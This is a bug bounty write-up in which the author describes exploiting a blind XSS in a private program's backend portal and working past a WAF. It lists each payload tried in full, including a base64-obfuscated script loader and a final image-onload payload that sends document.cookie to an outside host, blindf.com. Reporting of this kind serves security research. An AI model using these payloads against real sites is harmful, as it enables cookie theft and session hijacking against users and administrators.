Blind Xss (A mind game to win the battle)
In this write-up, I will explain how I exploited a blind XSS in the backend portal of a program.
I will not take much time and keep the write-up simple and point to point.
It was a private program so we will call it https://redacted.com.
I used https://blindf.com in order to exploit it. It's a platform/tool/framework to find blind XSS.
Attack Starts:
- Found a form on https://redacted.com
- I put Bhtml payload + BXSS payload in the text field
Payload:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"></script><script src=https://blindf.com/bx.php></script>
Result: WAF stopped me to submit the form.
3. I removed the BXSS payload. Now the payload was
Payload:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>
Result: WAF did not stop me and I successfully submitted the form. Next day Blindf confirmed the BHTML payload execution in the backend. Now It’s time to submit the Bxss payload. Because I knew that the backend portal is vulnerable and I just have to submit the Bxss payload.
4. Next Payload used. BHTML + BXSS
Payload:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"><svg onload='with(top)body.appendChild(createElement("script")).src="https://blindf.com/bx.php"'>Result: WAF did not stop me and I successfully submitted the payload. But again only BHTML payload worked and BXSS did not. Now again, its time to modify the payload.
5. Next payload used. BHTML + BXSS
Payload:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"> sfds"><base href="https://blindf.com"><script nonce='secret' src='./bx.php'></script>Result: WAF stopped me and I could not submit the form. Frustration was on the peak. Again its time to change the payload.
6. Next payload used. BHTML + BXSS
Payload:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmxpbmRmLmNvbS9ieC5waHAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>Result: Bypassed the WAF but again only BHTML worked and BXSS failed. Now it was not the time of payload modification but thinking about the situation.
Situation step by step:
- I used BHTML + BXSS payloads.
- Some Bxss payloads bypassed the WAF but did not execute in the backend portal where Bhtml payloads were going well and I was receiving back response from my BHTML payloads.
- Maybe something was stopping my remote js file from execution. [CORS or Same-origin policy]
- So I have to execute BXSS without including remote js file.
- But how can I confirm the payload execution in the backend if I just show an alert popup to them
- “<img” tag was working but I could not include remote js file.
- I have to make a payload that can respond back and confirm js code execution.
7. Now it’s time to modify the payload and attack again.
Payload used:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"> <img src=https://blindf.com/a.jpg onload=this.src='https://blindf.com/oc.php/?c='+document.cookie>Result: WAF bypassed. Bhtml payload executed. Bxss payload executed and I got the cookie value.
Severity: Critical (9 ~ 10)
Bounty: $1000
